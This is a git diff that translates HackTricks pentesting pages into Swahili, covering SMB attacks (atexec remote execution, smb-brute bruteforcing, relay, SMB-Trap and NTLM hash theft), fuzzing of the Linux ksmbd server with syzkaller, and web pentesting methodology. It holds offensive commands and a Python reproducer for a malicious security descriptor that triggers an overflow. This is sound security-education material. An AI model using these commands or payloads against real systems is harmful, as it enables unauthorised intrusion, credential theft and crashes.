### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Tekeleza amri kupitia Task Scheduler (kutumia _\pipe\atsvc_ kupitia SMB).\
Tekeleza amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
@ -422,36 +422,36 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
### ksmbd eneo la mashambulizi na SMB2/SMB3 protocol fuzzing (syzkaller)
{{#ref}}
ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}
## **Bruteforce taarifa za kuingia za watumiaji**
## **Bruteforce watumiaji credentials**
**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utavuka idadi ya jaribio zilizoruhusiwa**
**Hii haipendekezwi — unaweza kuzuia akaunti ikiwa utazidi idadi ya jaribio zinazoruhusiwa**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** them kwa **target machine**. Ikiwa authentication **session is successful**, it itaweka wewe moja kwa moja ndani ya **system** **shell**.\
Shambulio hili linatumia Responder toolkit kunasa **kikao za uthibitishaji za SMB** kwenye mtandao wa ndani, na **kuzirusha** kwa **mashine lengwa**. Ikiwa **kikao cha uthibitishaji kimefanikiwa**, kitatupa moja kwa moja kwenye **system** **shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Maktaba ya Windows URLMon.dll hujaribu kiotomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki kuthibitisha kwa mwenyeji wakati ukurasa unapotaka kufikia baadhi ya yaliyomo kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
This happens with the functions:
Hii hutokea kwa functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Which are used by some browsers and tools (like Skype)
Ambazo hutumika na baadhi ya browsers na tools (like Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
@ -461,11 +461,11 @@ Which are used by some browsers and tools (like Skype)
## NTLM Theft
Kama kwa SMB Trapping, kuwekea faili zenye madhara kwenye target system (via SMB, for example) kunaweza kusababisha jaribio la SMB authentication, likiaruhusu NetNTLMv2 hash kukamatwa na zana kama Responder. Hash inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
Sawa na SMB Trapping, kuweka faili zenye madhara kwenye mfumo lengwa (kwa mfano kupitia SMB) kunaweza kusababisha jaribio la uthibitishaji la SMB, na kuruhusu hash ya NetNTLMv2 kunaswa kwa kutumia zana kama Responder. Hash hiyo inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks Automatic Commands
## HackTricks Amri za Otomatiki
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.

106
src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md
View File

@ -1,26 +1,26 @@
# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller)
# ksmbd Uso wa Mashambulizi & Fuzzing ya Protocol ya SMB2/SMB3 (syzkaller)
{{#include ../../banners/hacktricks-training.md}}
## Overview
Ukurasa huu unaelezea mbinu za vitendo za kutumia na kufuzz Linux in-kernel SMB server (ksmbd) kwa kutumia syzkaller. Unalenga kupanua attack surface ya protocol kupitia usanidi, kujenga harness ya stateful inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs zenye sarufi sahihi, kuelekeza mutations kwenye njia za msimbo zenye coverage dhaifu, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Wakati utafiti wa awali ulitaja CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na snippet za konkret ambazo unaweza kuiga kwa setup zako.
## Muhtasari
Ukurasa huu unafupisha mbinu za vitendo za kuendesha na kufuzz server ya SMB iliyoko ndani ya kernel ya Linux (ksmbd) kwa kutumia syzkaller. Unalenga kuongeza uso wa mashambulizi wa protocol kupitia mipangilio, kujenga harness yenye state inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs za sarufi-inayokubalika, kuingiza mabadiliko yaliyopendelea kwenye njia za msimbo zenye kufikiwa kwa udhaifu kidogo, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Ingawa utafiti wa awali umeorodhesha CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na vipande vya kanuni unavyoweza kurekebisha kwa mazingira yako.
Target scope: SMB2/SMB3 over TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness iwe rahisi.
Eneo linalolengwa: SMB2/SMB3 juu ya TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness rahisi.
---
## Expand ksmbd Attack Surface via Configuration
Kwa default, setup minimal ya ksmbd inabakia ikiacha sehemu kubwa za server zisijapimwa. Washa vipengele vifuatavyo ili kuendesha server kupitia parsers/handlers zaidi na kufikia njia za msimbo za ndani:
## Panua Uso wa Mashambulizi wa ksmbd kupitia Mipangilio
Kwa chaguo-msingi, usanidi mdogo wa ksmbd unaacha sehemu kubwa za server zisifanyike mtihani. Washa vipengele vifuatavyo ili kusukuma server kupitia parsers/handlers za ziada na kufikia njia za msimbo za ndani zaidi:
- Global-level
- Durable handles
- Server multi-channel
- SMB2 leases
- Per-share-level
- Oplocks (on by default)
- VFS objects
- Ngazi ya globali
- Vishikio vya kudumu (Durable handles)
- Multi-channel ya server
- Lesi za SMB2
- Kiwango kwa kila share (Per-share-level)
- Oplocks (zimwezeshwa kwa chaguo-msingi)
- Vitu vya VFS
Kuwaweka hivi huongeza utekelezaji katika moduli kama:
Kuzima/kuwasha haya kunakuza utekelezaji katika moduli kama:
- smb2pdu.c (command parsing/dispatch)
- ndr.c (NDR encode/decode)
- oplock.c (oplock request/break)
@ -29,27 +29,27 @@ Kuwaweka hivi huongeza utekelezaji katika moduli kama:
- vfs_cache.c (lookup cache)
Vidokezo
- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Kagua /etc/ksmbd/ksmbd.conf na sehemu za per-share ili kuanzisha durable handles, leases, oplocks na VFS objects.
- Multi-channel na durable handles hubadilisha state machines na lifetimes, mara nyingi kuibua UAF/refcount/OOB bugs chini ya concurrency.
- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Pitia /etc/ksmbd/ksmbd.conf na sehemu za kila-share ili kuwezesha durable handles, lesi, oplocks na vitu vya VFS.
- Multi-channel na durable handles hubadilisha state machines na maisha ya vitu, mara nyingi zikiibua mdudu wa UAF/refcount/OOB chini ya ulandanishi.
---
## Authentication and Rate-Limiting Adjustments for Fuzzing
SMB3 inahitaji session halali. Kutekeleza Kerberos katika harness hukongeza ugumu, kwa hiyo penda kutumia NTLM/guest kwa fuzzing:
## Marekebisho ya Uthibitishaji na Kuzuia-Kiwango kwa Fuzzing
SMB3 inahitaji session halali. Kuweka Kerberos katika harness kunaongeza ugumu, hivyo upendeleo ni NTLM/guest kwa fuzzing:
- Ruhusu guest access na weka map to guest = bad user ili watumiaji wasiojulikana warejewe kwa GUEST.
- Kubali NTLMv2 (tengeneza patch policy ikiwa imezimwa). Hii inafanya handshake iwe rahisi wakati ikifanya exercise code paths za SMB3.
- Ondoa ukaguzi mkali wa credit wakati wa majaribio (post-hardening kwa CVE-2024-50285 ilifanya simultaneous-op crediting kuwa mkali zaidi). Vinginevyo, rate-limits zinaweza kukataa mfululizo wa fuzzed mapema sana.
- Ruhusu upatikanaji wa guest na weka map to guest = bad user ili watumiaji wasiojulikana waangukie GUEST.
- Kubali NTLMv2 (rekebisha policy ikiwa imezimwa). Hii huweka handshake rahisi huku ikifanyia kazi njia za msimbo za SMB3.
- Rekebisha au zima ukaguzi mkali wa credit wakati wa majaribio (kuimarishwa baada ya hardening kwa CVE-2024-50285 kulitengeneza crediting ya simultaneous-op kuwa kali zaidi). Vinginevyo, vikwazo vya kiwango vinaweza kukataa mfululizo wa fuzzed mapema sana.
- Ongeza max connections (mfano, hadi 65536) ili kuepuka kukataliwa mapema wakati wa fuzzing yenye throughput kubwa.
Tahadhari: Taa marekebisho haya ni kwa ajili ya kuwezesha fuzzing pekee. Usitengeneze deployment na mipangilio hii kwenye uzalishaji.
Tahadhari: Laghilafu hizi ni kwa ajili ya kuwezesha fuzzing pekee. Usitumiwe na mipangilio hii katika uzalishaji.
---
## Stateful Harness: Extract Resources and Chain Requests
SMB ni stateful: maombi mengi yanategemea identifiers zinazorejeshwa na majibu ya awali (SessionId, TreeID, FileID pairs). Harness yako lazima iparse majibu na itumie IDs ndani ya programu ile ile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close).
## Stateful Harness: Tenga Rasilimali na Kuunganisha Maombi
SMB ni stateful: maombi mengi yanategemea vitambulisho vinavyorejeshwa na majibu ya awali (SessionId, TreeID, jozi za FileID). Harness yako lazima ichambue majibu na itumie tena IDs ndani ya programu ileile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close).
Example snippet to process a response buffer (skipping the +4B NetBIOS PDU length) and cache IDs:
Mfano wa kipande cha kanuni cha kushughulikia response buffer (kutoruhusu +4B NetBIOS PDU length) na kuhifadhi IDs:
```c
// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
@ -76,13 +76,13 @@ break;
}
```
Vidokezo
- Weka mchakato mmoja wa fuzzer unaoshirikia authentication/state: utulivu na coverage bora na ksmbds global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops async, na rerun ndani.
- reset_acc_state ya majaribio ya Syzkaller inaweza kureset global state lakini inaweza kusababisha slowdown kubwa. Pendelea utulivu na kuzingatia fuzzing badala yake.
- Tumia mchakato mmoja wa fuzzer unaoshiriki authentication/state: hutoa uthabiti na coverage bora kutokana na ksmbds global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops kuwa async; hufanya rerun internally.
- Syzkallers experimental reset_acc_state inaweza kurudisha global state lakini inaweza kusababisha slowdown kubwa ya utendaji. Pendelea uthabiti na zingatia fuzzing badala yake.
---
## Grammar-Driven SMB2 Generation (Valid PDUs)
Tafsiri miundo ya SMB2 kutoka Microsoft Open Specifications kuwa sarufi ya fuzzer ili generator yako itengeneze PDUs halali kimuundo, ambazo zinawafikia dispatchers na IOCTL handlers kwa mfumo.
## Uundaji wa SMB2 Unaotokana na Sarufi (PDUs Halali)
Tafsiri muundo wa Microsoft Open Specifications SMB2 kuwa sarufi ya fuzzer ili generator yako izalisha PDUs zenye muundo sahihi, ambazo zinafikia kwa mfumo dispatchers na IOCTL handlers.
Mfano (SMB2 IOCTL request):
```
@ -107,12 +107,12 @@ Input array[int8]
Output array[int8]
} [packed]
```
Mtindo huu unalazimisha structure sizes/offsets sahihi na huboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation.
Mtindo huu unalazimisha ukubwa na offsets sahihi za miundo na kuboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation.
---
## Directed Fuzzing With focus_areas
Tumia syzkallers experimental focus_areas kuipa uzito zaidi functions/files maalum ambazo kwa sasa zina coverage dhaifu. Mfano wa JSON:
Tumia syzkallers experimental focus_areas kuzipa uzito maalum functions/files ambazo kwa sasa zina coverage dhaifu. Mfano JSON:
```json
{
"focus_areas": [
@ -122,9 +122,9 @@ Tumia syzkallers experimental focus_areas kuipa uzito zaidi functions/files m
]
}
```
Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor mbaya yenye dacloffset kubwa kupita kiasi husababisha integer-overflow.
Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor yenye nia mbaya na dacloffset kubwa inasababisha integer-overflow.
Mjenzi wa reproducer (minimal Python):
Reproducer builder (minimal Python):
```python
def build_sd():
import struct
@ -143,8 +143,8 @@ return bytes(sd)
```
---
## Kuvunja Mipaka ya Coverage kwa ANYBLOB
anyTypes ya syzkaller (ANYBLOB/ANYRES) zinaruhusu kupunguza miundo tata kuwa blobs zinazobadilika kwa njia ya jumla. Anzisha corpus mpya kutoka kwa public SMB pcaps na badilisha payloads kuwa programu za syzkaller zinazoita pseudo-syscall yako (mfano, syz_ksmbd_send_req):
## Kuvunja Plateau za Coverage kwa ANYBLOB
syzkallers anyTypes (ANYBLOB/ANYRES) zinawezesha kupunguza miundo tata kuwa blobs zinazobadilika kwa njia ya jumla. Tengeneza corpus mpya kutoka kwa SMB pcaps za umma na ubadilishe payloads kuwa programu za syzkaller zinazoiita pseudo-syscall yako (mfano, syz_ksmbd_send_req):
```bash
# Extract SMB payloads to JSON
# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json
@ -167,14 +167,14 @@ f.write(
f"syz_ksmbd_send_req(&(&(0x7f0000000340))=ANY=[@ANYBLOB=\"{pdu}\"], {hex(pdu_size)}, 0x0, 0x0)"
)
```
Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha mara moja UAFs (mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache.
Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha UAFs mara moja (kwa mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache.
---
## Sanitizers: Zaidi ya KASAN
- KASAN bado ni chombo kuu cha kugundua heap bugs (UAF/OOB).
- KCSAN mara nyingi hutoa false positives au low-severity data races kwa lengo hili.
- UBSAN/KUBSAN zinaweza kugundua makosa ya declared-bounds ambayo KASAN hupoteza kutokana na semantiki za index za array. Mfano:
## Sanitizers: Beyond KASAN
- KASAN bado ni kifuatilia/chombo kuu cha kugundua hitilafu za heap (UAF/OOB).
- KCSAN mara nyingi huonyesha false positives au data races zenye uzito mdogo katika lengo hili.
- UBSAN/KUBSAN inaweza kugundua declared-bounds mistakes ambazo KASAN hupoteza kutokana na array-index semantics. Mfano:
```c
id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
struct smb_sid {
@ -182,28 +182,28 @@ __u8 revision; __u8 num_subauth; __u8 authority[NUM_AUTHS];
__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));
```
Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogunduliwa na UBSANs declared-bounds checks.
Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], iliyogunduliwa na ukaguzi wa declared-bounds wa UBSAN.
---
## Vidokezo kuhusu Throughput na Parallelism
- Mchakato mmoja wa fuzzer (shared auth/state) huwa imara zaidi kwa ksmbd na bado huibua races/UAFs shukrani kwa syzkallers internal async executor.
- Kwa VM nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde kwa ujumla. Coverage ya ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c inapatikana, ingawa coverage ya state-transition haionyeshwi ipasavyo na metriksi hizi.
## Throughput and Parallelism Notes
- Mchakato mmoja wa fuzzer (shared auth/state) huwa thabiti zaidi kwa ksmbd na bado huibua races/UAFs kutokana na executor ya ndani async ya syzkaller.
- Kwa VMs nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde jumla. Ufunikaji wa ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c unaweza kupatikana, ingawa ufunikaji wa state-transition hauwakilishwa vya kutosha na metriki hizo.
---
## Orodha ya Kivitendo
- Washa durable handles, leases, multi-channel, oplocks, na VFS objects katika ksmbd.
- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa utulivu wa fuzzer.
## Practical Checklist
- Washa durable handles, leases, multi-channel, oplocks, na VFS objects ndani ya ksmbd.
- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa uthabiti wa fuzzer.
- Jenga stateful harness inayohifadhi SessionId/TreeID/FileIDs na kuunganisha create → ioctl → close.
- Tumia grammar kwa SMB2 PDUs ili kudumisha uhalali wa muundo.
- Tumia focus_areas kuwekeza zaidi kwenye functions zenye coverage dhaifu (mifano, smbacl.c njia kama smb_check_perm_dacl).
- Changanya na ANYBLOB kutoka kwenye pcaps halisi kuvunja plateaus; pakia seeds na syz-db kwa matumizi tena.
- Endesha kwa KASAN + UBSAN; fanyia triage kwa uangalifu ripoti za UBSAN declared-bounds.
- Tumia sarufi (grammar) kwa SMB2 PDUs ili kudumisha uhalali wa muundo.
- Tumia focus_areas kuipa uzito zaidi weakly-covered functions (e.g., smbacl.c paths like smb_check_perm_dacl).
- Seed with ANYBLOB kutoka pcaps halisi ili kuvunja plateaus; pack seeds na syz-db kwa matumizi ya baadaye.
- Endesha na KASAN + UBSAN; pitia ripoti za UBSAN za declared-bounds kwa uangalifu.
---
## Marejeo
## References
- Doyensec ksmbd Fuzzing (Part 2): https://blog.doyensec.com/2025/09/02/ksmbd-2.html
- syzkaller: https://github.com/google/syzkaller
- ANYBLOB/anyTypes (commit 9fe8aa4): https://github.com/google/syzkaller/commit/9fe8aa4
@ -214,6 +214,6 @@ Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogund
- KCSAN: https://docs.kernel.org/dev-tools/kcsan.html
- Microsoft Open Specifications (SMB): https://learn.microsoft.com/openspecs/
- Wireshark Sample Captures: https://wiki.wireshark.org/SampleCaptures
- Usomaji wa nyongeza: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mus syzkaller notes
- Background reading: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mus syzkaller notes
{{#include ../../banners/hacktricks-training.md}}

228
src/network-services-pentesting/pentesting-web/README.md
View File

@ -1,10 +1,10 @@
# 80,443 - Pentesting Wavuti Mbinu
# 80,443 - Pentesting Web Mbinu
{{#include ../../banners/hacktricks-training.md}}
## Taarifa za Msingi
## Taarifa Msingi
Huduma ya wavuti ndiyo **huduma inayotokea zaidi na yenye upeo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
Huduma ya wavuti ni huduma inayotumika sana na **yenye upeo mpana**, na kuna **aina tofauti za vulnerabilities**.
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
@ -24,31 +24,31 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
web-api-pentesting.md
{{#endref}}
## Muhtasari wa Mbinu
## Muhtasari wa metodolojia
> Katika mbinu hii tutachukulia kwamba unalenga domain (au subdomain) na tu hiyo. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambulika ndani ya upeo.
> Katika metodolojia hii tutadhani kwamba unamilenga kujaribu domain (au subdomain) na ndiyo tu. Kwa hivyo, unapaswa kutumia metodolojia hii kwa kila domain, subdomain au IP iliyogunduliwa yenye server ya wavuti isiyothibitishwa ndani ya scope.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **tricks** za kuzingatia wakati wa mtihani ukifanikiwa kutambua tech.
- [ ] Kuna **udhaifu unaojulikana** wa toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na server ya wavuti. Tafuta **tricks** za kukumbuka selama ya mtihani ikiwa unaweza kutambua tech kwa mafanikio.
- [ ] Je kuna **udhaifu uliotambuliwa** wa toleo la teknolojia?
- [ ] Unatumia **tech** yoyote inayojulikana? Kuna **trick muhimu** ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Endesha **general purposes scanners**. Huwezi kujua kama zitapata kitu au zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (if **HTTPS**).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** yote yanayowezekana ya **faili, folda** na **parameters being used.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa spidered._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta faili na directories mpya.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongezea extensions za backup zinazojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta vigezo vilivyo fiche**.
- [ ] Mara tu umeshapata na **tambulisha** yote yanayowezekana **endpoints** zinazopokea **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii](../../pentesting-web/web-vulnerabilities-methodology.md)
- [ ] Endesha **general purposes scanners**. Huwezi kujua ikiwa zitapata kitu au ikiwa zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote, folder zote na **parameters zinazotumika.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kuspidering._
- [ ] **Directory Brute-Forcing**: Jaribu brute force folder zote zilizogunduliwa unatafuta **faili** mpya na **direktori**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kuongezewa Brute-Forced._
- [ ] **Backups checking**: Jaribu kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongeza extensions za kawaida za backup.
- [ ] **Brute-Force parameters**: Jaribu **kupata vigezo vilivyo fiche**.
- [ ] Mara tu unapokuwa umetoa orodha ya yote ya **endpoints** zinazopokea **user input**, angalia aina zote za **udhaifu** zinazohusiana nazo.
- [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
## Toleo la Server (Vulnerable?)
## Server Version (Vulnerable?)
### Tambua
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la server linaloendesha.\
**HTTP headers** na **cookies** za response zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** zinazotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia inaweza kuwa muhimu zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com)**:**
Kagua kama kuna **udhaifu uliotambulika** kwa toleo la server linaloendesha.\
The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
@ -65,7 +65,7 @@ Tafuta [**vulnerabilities of the web application** **version**](../../generic-ha
### Mbinu za teknolojia za wavuti
Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tofauti zinazotumika:
Baadhi ya **mbinu** za **kupata vulnerabilities** katika **technologies** mbalimbali maarufu zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
@ -102,27 +102,27 @@ Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tof
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
- [**Sitecore**](sitecore/index.html)
_Zingatia kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._\
Ikiwa web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
_Chukua akilini kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._
Ikiwa programu ya wavuti inatumia yoyote ya **teknolojia/jukwaa iliyotajwa hapo juu** au **nyingine yoyote**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Mapitio ya Source Code
### Mapitio ya Msimbo Chanzo
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na kufanya kwa **your own a White box test** ya application kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** ya sasa:
Ikiwa **source code** ya programu inapatikana kwenye **github**, mbali na kufanya kwa **wewe mwenyewe a White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** kwa sasa **Black-Box testing**:
- Je, kuna faili ya **Change-log or Readme or Version** au kitu chochote chenye **version info accessible** kupitia wavuti?
- Je, **credentials** zimehifadhiwa vipi na wapi? Je, kuna (inayoweza kupatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko katika **plain text**, **encrypted** au ni algorithimu gani ya **hashing algorithm** inatumiwa?
- Je, inatumia **master key** yoyote kwa ku-encrypt kitu? Ni **algorithm** gani inatumiwa?
- Vipi na wapi **credentials** zimehifadhiwa? Je, kuna (**inayopatikana?**) **file** yenye credentials (majina ya watumiaji au nywila)?
- Je, **passwords** ziko kwa **plain text**, **encrypted** au ni algorithimu gani ya **hashing** inayotumika?
- Je, inatumia **master key** yoyote kwa kusimba kitu? Ni **algorithm** gani inatumiwa?
- Je, unaweza **access any of these files** ukitumia udhaifu fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (pengine kuna **password introduced inside an old commit**)?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (labda some **password introduced inside an old commit**)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Skana za kiotomatiki
### Skana za moja kwa moja
#### Skana za kiotomatiki za matumizi ya jumla
#### Skana za otomatiki za matumizi ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
@ -134,9 +134,9 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### Skana za CMS
#### CMS scanners
Ikiwa CMS inatumiwa, usisahau **kufanya skana** — pengine unaweza kupata kitu cha kuvutia:
Ikiwa CMS inatumiwa usisahau **run a scanner**, labda utapata kitu cha kuvutia:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
@ -149,11 +149,11 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za Web server zinazotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu kadhaa za kuzingatia wakati wa mtihani. Ikiwa una bahati uliweza hata kupata CMS na kuendesha scanner.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa kuhusu web server inayotumika na mteja (ikiwa data yoyote imetolewa) na baadhi ya mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati umepata hata CMS na kuendesha scanner.
## Step-by-step Web Application Discovery
> Kutoka hapa tutaanza kuingiliana na web application.
> Kuanzia hapa tutaanza kuingiliana na web application.
### Initial checks
@ -164,30 +164,30 @@ joomlavs.rb #https://github.com/rastating/joomlavs
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni kwenye kurasa kuu na kurasa za pili.
- Check also comments in the main and secondary pages.
**Forcing errors**
Web servers zinaweza **kutenda kwa njia isiyotarajiwa** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **udhaifu** au kusababisha **kufichua taarifa nyeti**.
Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
- Fikia kurasa za **fake** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[["** katika **cookie values** na **parameter** values ili kusababisha makosa
- Zalisha kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **different HTTP Verbs** kama PATCH, DEBUG au mbaya kama FAKE
- Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
- **Add "\[]", "]]", and "\[["** in **cookie values** and **parameter** values to create errors
- Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
- Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
